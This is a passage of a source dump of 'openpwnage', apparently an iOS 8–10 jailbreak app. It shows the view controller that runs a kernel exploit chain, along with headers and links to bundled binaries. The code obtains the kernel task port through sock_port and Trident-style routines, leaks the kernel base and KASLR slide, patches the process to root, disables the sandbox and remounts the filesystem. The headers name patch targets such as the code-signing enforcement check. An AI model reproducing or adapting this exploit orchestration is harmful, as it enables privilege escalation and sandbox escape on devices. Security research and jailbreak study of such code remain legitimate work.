184 |         consoleView.backgroundColor = UIColorFromRGB(0xF9c9c9);
185 |     }
186 | }
187 | - (IBAction)jailbreakButtonPressed:(id)sender {
188 |     [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateNormal];
189 |     [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateHighlighted];
190 |     [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateSelected];
191 |     [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateDisabled];
192 |     _jbButton.enabled = NO;
193 |     /*CGRect frame = _jbButton.frame;
194 |     frame.size.height += 1;
195 |     _jbButton.frame = frame;*/
196 |     [_jbButton setNeedsDisplay];
197 |     NSLog(@"button pressed");
198 |     dispatch_async(dispatch_get_main_queue(), ^{
199 |         [self performSelector:@selector(openpwnage) withObject:self];
200 |     });
201 | }
202 | 
203 | -(void)openpwnage {
204 |     size_t size;
205 |     sysctlbyname("kern.version", NULL, &size, NULL, 0);
206 |     char *kernelVersion = malloc(size);
207 |     sysctlbyname("kern.version", kernelVersion, &size, NULL, 0);
208 |     olog("%s\n",kernelVersion);
209 |     
210 |     char *newkernv = malloc(size - 44);
211 |     char *semicolon = strchr(kernelVersion, '~');
212 |     int indexofsemi = (int)(semicolon - kernelVersion);
213 |     int indexofrootxnu = indexofsemi;
214 |     while (kernelVersion[indexofrootxnu - 1] != '-') {
215 |         indexofrootxnu -= 1;
216 |     }
217 |     memcpy(newkernv, &kernelVersion[indexofrootxnu], indexofsemi - indexofrootxnu + 2);
218 |     newkernv[indexofsemi - indexofrootxnu + 2] = '\0';
219 |         
220 |     olog("Kernel Version: %s\n",newkernv);
221 |     NSString *kver = [NSString stringWithCString:newkernv encoding:NSUTF8StringEncoding];
222 |     if ([@"3789.70.16~4" isEqualToString:kver]) { //iOS 10
223 |         [self openpwnageConsoleLog:@"[*]starting jailbreak...\n"];
224 |         task_t tfp0 = sock_port_tfp0();
225 |         if (tfp0 == 0) {
226 |             olog("failed to get tfp0 :(\n");
227 |             exit(42);
228 |         }
229 |         [self openpwnageConsoleLog:@"[*]we tried getting tfp0, and holy shit it actually worked\n"];
230 |         [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]tfp0=0x%x\n", tfp0]];
231 |         [self openpwnageConsoleLog:@"[*]we should try getting kbase now, hold on...\n"];
232 |         uintptr_t kernel_base = get_kernel_base(tfp0);
233 |         [self openpwnageConsoleLog:@"[*]ayo, yet another success!\n"];
234 |         [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]huzzah, kbase=0x%08lx\n", kernel_base]];
235 |         [self openpwnageConsoleLog:@"[*]one more thing we need to get before patching: kaslr slide.\n"];
236 |         uintptr_t kaslr_slide = kernel_base - UNSLID_BASE;
237 |         [self openpwnageConsoleLog:@"[*]WOOO! Now we talkin'!\n"];
238 |         [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]slide=0x%08lx\n", kaslr_slide]];
239 |         [self openpwnageConsoleLog:@"[*]obtaining root...\n"];
240 |         
241 |         if (rootify(tfp0, kernel_base, kaslr_slide)) {
242 |             [self openpwnageConsoleLog:@"[*]we root baby\n"];
243 |         }
244 |         if (is_pmap_patch_success(tfp0, kernel_base, kaslr_slide)) {
245 |             olog("pmap patch success!\n");
246 |         } else {
247 |             olog("pmap patch no success :(\n");
248 |         }
249 |     } else if ([[NSArray arrayWithObjects:@"2784.40.6~1",@"2784.30.7~3",@"2784.30.7~1",@"2784.30.5~7",@"2784.20.34~2",nil] containsObject:kver]) { //iOS 8.3-8.4.1
250 |         olog("starting jb\n");
251 |         //[self openpwnageConsoleLog:@"[*]aw yeah da hot sauce\n"];
252 |         //consoleView.text = [[NSString alloc]initWithString:[consoleView.text stringByAppendingString:@"fill me with cum already\n"]];
253 |         mach_port_t tfp0 = dajb();
254 |         if (tfp0 == 0) {
255 |             olog("failed to get tfp0 :(\n");
256 |             exit(42);
257 |         }
258 |         //task_t tfp0 = get_kernel_task();
259 |         olog("getting kbase again rather than using our existing one because idfk...\n");
260 |         uint32_t kernel_base = leak_kernel_base();
261 |         //uintptr_t kernel_base = kbase();
262 |         olog("[*]woo kbase got... again\n");
263 |         olog("[*]kbase=0x%08lx\n", kernel_base); //this works
264 |         CGRect frame = consoleView.frame;
265 |         frame.size.height -= 1;
266 |         consoleView.frame = frame;
267 |         [consoleView setNeedsDisplay];
268 |         //sleep(10);
269 |         olog("[*]calculating kaslr slide...\n");
270 |         uint32_t kaslr_slide = kernel_base - UNSLID_BASE;
271 |         [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]slide=0x%08x\n", kaslr_slide]];
272 |         [self openpwnageConsoleLog:@"[*]obtaining root...\n"];
273 |         if (rootify(tfp0, kernel_base, kaslr_slide)) {
274 |             [self openpwnageConsoleLog:@"[*]we root baby\n"];
275 |             if (is_pmap_patch_success(tfp0, kernel_base, kaslr_slide)) {
276 |                 olog("pmap patch success!\n");
277 |             } else {
278 |                 olog("pmap patch no success :(\n");
279 |             }
280 |             olog("time for unsandbox...\n");
281 |             unsandbox8(tfp0,kernel_base,kaslr_slide);
282 |         } else {
283 |             [self openpwnageConsoleLog:@"[*]root failed :(\n"];
284 |         }
285 |     } else { //iOS 9
286 |     [self openpwnageConsoleLog:@"[*]starting jailbreak...\n"];
287 |     task_t tfp0 = get_kernel_task();
288 |     [self openpwnageConsoleLog:@"[*]we tried getting tfp0, and holy shit it actually worked\n"];
289 |     [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]tfp0=0x%x\n", tfp0]];
290 |     [self openpwnageConsoleLog:@"[*]we should try getting kbase now, hold on...\n"];
291 |     uintptr_t kernel_base = kbase();
292 |     [self openpwnageConsoleLog:@"[*]ayo, yet another success!\n"];
293 |     [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]huzzah, kbase=0x%08lx\n", kernel_base]];
294 |     [self openpwnageConsoleLog:@"[*]one more thing we need to get before patching: kaslr slide.\n"];
295 |     uintptr_t kaslr_slide = kernel_base - UNSLID_BASE;
296 |     [self openpwnageConsoleLog:@"[*]WOOO! Now we talkin'!\n"];
297 |     [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]slide=0x%08lx\n", kaslr_slide]];
298 |     [self openpwnageConsoleLog:@"[*]cleaning up exploit...\n"];
299 |     exploit_cleanup(tfp0);
300 |     [self openpwnageConsoleLog:@"[*]nice and tidy\n"];
301 |     [self openpwnageConsoleLog:@"[*]this is great and all, but now time for actual shit\n"];
302 |     //patch kernel pmap
303 |     [self openpwnageConsoleLog:@"[*]obtaining root...\n"];
304 |     if (rootify(tfp0, kernel_base, kaslr_slide)) {
305 |         [self openpwnageConsoleLog:@"[*]we root baby\n"];
306 |         [self openpwnageConsoleLog:@"[*]now, time to nuke sandbox\n"];
307 |         if (unsandbox(tfp0, kernel_base, kaslr_slide)) {
308 |             [self openpwnageConsoleLog:@"[*]no need to worry about sandbox anymore\n"];
309 |             [self openpwnageConsoleLog:@"[*]attempting remounting...\n"];
310 |             if (remount()) {
311 |                 olog("remount success!");
312 |             }
313 |         } else {
314 |             [self openpwnageConsoleLog:@"[*]failed to nuke sandbox\n"];
315 |         }
316 |     } else {
317 |         [self openpwnageConsoleLog:@"[*]failed to get root :(\n"];
318 |     }
319 |     //unpatch pmap
320 |     [self openpwnageConsoleLog:@"[*]that's all for know. more soon (hopefully)\n"];
321 |     //go();
322 |     }
323 | }
324 | 
325 | -(void)openpwnageConsoleLog: (NSString*)textToLog {
326 |     NSLog(@"%@", [[NSString alloc]initWithString:textToLog]);
327 |     NSMutableString *mutableLog = [consoleView.text mutableCopy];
328 |     
329 |     consoleView.text = [[NSString alloc]initWithString:[mutableLog stringByAppendingString:textToLog]];
330 |     /*dispatch_async(dispatch_get_main_queue(), ^{
331 |         [consoleView setNeedsDisplay];
332 |     });
333 |     CGRect frame = consoleView.frame;
334 |     frame.size.height += 1;
335 |     consoleView.frame = frame;
336 |     frame.size.height -= 1;
337 |     consoleView.frame = frame;
338 |     //[consoleView scrollRangeToVisible:NSMakeRange(consoleView.text.length, 0)];
339 |     [consoleView setNeedsDisplay];
340 |     //CGRect frame = consoleView.frame;
341 |     frame.size.height += 1;
342 |     consoleView.frame = frame;
343 |     frame.size.height -= 1;
344 |     consoleView.frame = frame;*/
345 |     //return;
346 |     return;
347 | }
348 | 
349 | void openpwnageCLog(NSString* textToLog) {
350 |     //NSLog(@"openpwnageCLog\n");a
351 |     //NSLog(@"%@", [[NSString alloc]initWithString:textToLog]);
352 |     /*dispatch_sync(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_BACKGROUND, 0), ^{
353 |         [param_ openpwnageConsoleLog:textToLog];
354 |     });*/
355 |     [param_ openpwnageConsoleLog:textToLog];
356 |     /*[UIView performWithoutAnimation:^{ \
357 |         [param_ openpwnageConsoleLog:textToLog];
358 |     }]; \*/
359 |     /*dispatch_async(dispatch_get_main_queue(), ^{
360 |         [param_ openpwnageConsoleLog:textToLog];
361 |     });*/
362 | }
363 | 
364 | @end
365 | 


--------------------------------------------------------------------------------
/openpwnage/bootstrap.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/bootstrap.tar


--------------------------------------------------------------------------------
/openpwnage/jailbreak.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  jailbreak.h
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 4/24/22.
 6 | //
 7 | 
 8 | #ifndef jailbreak_h
 9 | #define jailbreak_h
10 | 
11 | bool rootify(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide);
12 | bool unsandbox(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide);
13 | bool unsandbox8(mach_port_t tfp0, uint32_t kernel_base, uint32_t kaslr_slide);
14 | //void patch_kernel_pmap(void);
15 | bool is_pmap_patch_success(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide);
16 | void olog(char *format, ...);
17 | void pmap_unpatch(task_t tfp0);
18 | bool remount(void);
19 | uint64_t find_da_allproc(uint64_t ourproc, mach_port_t tfp0);
20 | #endif /* jailbreak_h */
21 | 


--------------------------------------------------------------------------------
/openpwnage/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/launchctl


--------------------------------------------------------------------------------
/openpwnage/main.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  main.m
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 4/20/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | #import "AppDelegate.h"
10 | 
11 | int main(int argc, char * argv[]) {
12 |     NSString * appDelegateClassName;
13 |     @autoreleasepool {
14 |         // Setup code that might create autoreleased objects goes here.
15 |         appDelegateClassName = NSStringFromClass([AppDelegate class]);
16 |     }
17 |     return UIApplicationMain(argc, argv, nil, appDelegateClassName);
18 | }
19 | 


--------------------------------------------------------------------------------
/openpwnage/openpwnage/patchfinder8.h:
--------------------------------------------------------------------------------
 1 | #ifndef patchfinder8_h
 2 | #define patchfinder8_h
 3 | 
 4 | #include <stdint.h>
 5 | #include <string.h>
 6 | 
 7 | uint32_t find_mount8(uint32_t region, uint8_t* kdata, size_t ksize);
 8 | uint32_t find_cs_enforcement_disable_amfi8(uint32_t region, uint8_t* kdata, size_t ksize);
 9 | uint32_t find_sandbox_call_i_can_has_debugger8(uint32_t region, uint8_t* kdata, size_t ksize);
10 | uint32_t find_vn_getpath8(uint32_t region, uint8_t* kdata, size_t ksize);
11 | uint32_t find_memcmp8(uint32_t region, uint8_t* kdata, size_t ksize);
12 | uint32_t find_sb_patch8(uint32_t region, uint8_t* kdata, size_t ksize);
13 | uint32_t find_p_bootargs8(uint32_t region, uint8_t* kdata, size_t ksize);
14 | #endif /* patchfinder8_h */
15 | 


--------------------------------------------------------------------------------
/openpwnage/openpwnage/trident.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  trident.h
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 8/2/22.
 6 | //
 7 | 
 8 | #ifndef trident_h
 9 | #define trident_h
10 | mach_port_t dajb(void);
11 | uint32_t leak_kernel_base(void);
12 | #endif /* trident_h */
13 | 


--------------------------------------------------------------------------------
/openpwnage/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/tar


--------------------------------------------------------------------------------
/releases/openpwnage-build9-fix.ipa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/releases/openpwnage-build9-fix.ipa


--------------------------------------------------------------------------------